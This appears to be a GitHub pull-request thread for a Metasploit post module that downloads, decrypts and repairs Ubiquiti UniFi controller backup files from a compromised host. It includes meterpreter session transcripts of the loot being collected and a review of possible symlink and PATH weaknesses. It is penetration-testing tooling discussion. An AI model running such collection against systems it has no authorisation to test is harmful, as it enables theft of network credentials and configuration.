unifi backup downloader

[h00die]

Post module to run against Ubiquiti Unifi Controllers to download any backup or autobackup files.

These files are.... annoying. They have a .unf extension but are AES encrypted zip files. Luckily, its a known key so we decrypt it. The files then need to be repaired, zip has -FF to do this (and it works), however the ruby zip gems dont have this. So if zip is available on the system (aka nix and maybe osx), we repair the file as well. If a repair doesn't happen, 7zip may work, but haven't tried.

See docs for install instructions, and verification steps.

@bcoles there is a system call in here, the module provides all input, can you think of an RCE possible on this? I thought maybe if your target was something with ticks in it maybe, but also couldn't think of a better way to do the call. Open to help and suggestions!

[bcoles]

These files are.... annoying. They have a .unf extension but are AES encrypted zip files. Luckily, its a known key so we decrypt it. The files then need to be repaired, zip has -FF to do this (and it works), however the ruby zip gems dont have this. So if zip is available on the system (aka nix and maybe osx), we repair the file as well. If a repair doesn't happen, 7zip may work, but haven't tried.

I believe the established approach is to cry. Something like this:

    print_status('The backup files were stored in the loot database.')
    print_status('The files are ZIP encrypted, and due to the lack of the archive/zip gem,')
    print_status('they cannot be decrypted in Metasploit.')
    print_status('You will need to open them up with zip or a similar utility, and use the')
    print_status('password <whatever the password is @hoodie)> to unzip them.')
    print_status('Annoy the Metasploit developers until this gets fixed!')

@bcoles there is a system call in here, the module provides all input, can you think of an RCE possible on this? I thought maybe if your target was something with ticks in it maybe, but also couldn't think of a better way to do the call. Open to help and suggestions!

The obvious attack vectors are local. No obvious remote vector, as the path and arguments are fully controlled by Metasploit store_loot and Rex::Quickfile. Obviously a malicious zip could have unintended consequences if the zip utility on the system has known vulnerabilities (ie, traversal).

A couple of things stand out, but may prove to be non-issues:

• Rex::Quickfile writes to /tmp with 600 permissions and randomized file name. May be racey (?)
  • Edit: Perhaps a more likely local attack vector exists with --out #{temp_file.path}.zip. Possible symlink attack for arbitrary file overwrite?
• system call may suffer from pathing issues for yes, and maybe zip, depending how zip_exe = Msf::Util::Helper.which('zip') works, as the full path is not provided.

[bcoles]

rapid7/rex-zip#2
rapid7/rex-zip#3

[h00die]

It isn't a password protected zip, its an AES encrypted zip. If I didn't document that clearly, i definitely can adjust.

to be clear, the database file needs the following:
unzip(fix_zip(aes_decrypt(file)))
and after that, we most likely only care about db.gz because of course a gz in a zip:
bson_reader(gunzip(db.gz))

First things first, get files. Once this lands, I'll work on a db parser.

[jmartin-tech]

Default backup path on macOS is ~/Library/Application Support/UniFi/data/backup/autobackup/.

[jmartin-tech]

Sorry wrong button, should not have closed :-(

[h00die]

Thanks @jmartin-r7 . Added osx to the code, however w/o a box to test with, someone will need to test that portion.

[h00die]

Travis error isn't related to this PR code:

ERROR:  While executing gem ... (Gem::RemoteFetcher::UnknownHostError)
    timed out (https://api.rubygems.org/specs.4.8.gz)
The command "gem update --system" failed and exited with 1 during .

[h00die]

delayed until I can test on a mac

[h00die]

OSX testing completed, this is ready for review.

[h00die]

ping anyone with unify, this has been ready for review for a month and its framework friday :)

[h00die]

Just tested against 5.10.23 (latest) and still working. I did notice though that when on a shell, if there are multiple files which are larger in size, or the encrypted zips have something that breaks the cat command (unsure which is true), the module will crash. Fixed that, dropped shell support, and documented.

[jmartin-tech]

This works and I can land as is if desire is to defer on enhancements I have noted.

[jmartin-tech]

From testing.

Might be worth adding some detail here when no locations result in data.

On a windows system with no backup stored the module reported accessing system.properties and did then complete. When no backup exists may be worth a status.

I also noted on Linux when the session user does not have read access to system.properties path there is no detail reported.

Same linux target:
session as regular user

msf5 payload(linux/x64/meterpreter/reverse_tcp) > use post/multi/gather/ubiquiti_unifi_backup
msf5 post(multi/gather/ubiquiti_unifi_backup) > set session 1
session => 1
msf5 post(multi/gather/ubiquiti_unifi_backup) > run
[*] Post module execution completed
msf5 post(multi/gather/ubiquiti_unifi_backup) > exit

session as root

msf5 payload(linux/x64/meterpreter/reverse_tcp) > use post/multi/gather/ubiquiti_unifi_backup
msf5 post(multi/gather/ubiquiti_unifi_backup) > set session 1
session => 1
msf5 post(multi/gather/ubiquiti_unifi_backup) > run

[+] Read UniFi Controller file /var/lib/unifi/system.properties
[+] File /var/lib/unifi/backup/5.10.23.unf saved to /home/msfuser/.msf4/loot/20190514173003_default_192.168.17.102_ubiquiti.unifi.b_530890.unf
[+] File 5.10.23.unf DECRYPTED and saved to /home/msfuser/.msf4/loot/20190514173003_default_192.168.17.102_ubiquiti.unifi.b_721128.zip.  File needs to be repair via `zip -FF`
[*] Attempting to repair zip file (this is normal)
[+] File /var/lib/unifi/backup/5.10.23.unf DECRYPTED and REPAIRED and saved to /home/msfuser/.msf4/loot/20190514173004_default_192.168.17.102_ubiquiti.unifi.b_058997.zip.
[+] File /var/lib/unifi/backup/autobackup/autobackup_5.10.23_20190514_1725_1557854700012.unf saved to /home/msfuser/.msf4/loot/20190514173005_default_192.168.17.102_ubiquiti.unifi.b_558645.unf
[+] File autobackup_5.10.23_20190514_1725_1557854700012.unf DECRYPTED and saved to /home/msfuser/.msf4/loot/20190514173005_default_192.168.17.102_ubiquiti.unifi.b_491301.zip.  File needs to be repair via `zip -FF`
[*] Attempting to repair zip file (this is normal)
[+] File /var/lib/unifi/backup/autobackup/autobackup_5.10.23_20190514_1725_1557854700012.unf DECRYPTED and REPAIRED and saved to /home/msfuser/.msf4/loot/20190514173005_default_192.168.17.102_ubiquiti.unifi.b_438546.zip.
[*] Post module execution completed

[h00die]

I'd agree with you, looks like i went too 'linux' style and made everything verbose printing. I'll add a few prints for more detail.

[h00die]

Added two prints, one for when reading system.properties files, and one for when trying to read data. I could add another one for 'no data was found' as well if you'd think it to be beneficial

[jmartin-tech]

This works, thanks.

[jmartin-tech]

Release Notes

post/multi/gather/ubiquiti_unifi_backup downloads any backup or autobackup files from Ubiquiti Unifi Controllers on Windows/Linux/MacOS.

[h00die]

Thanks @jmartin-r7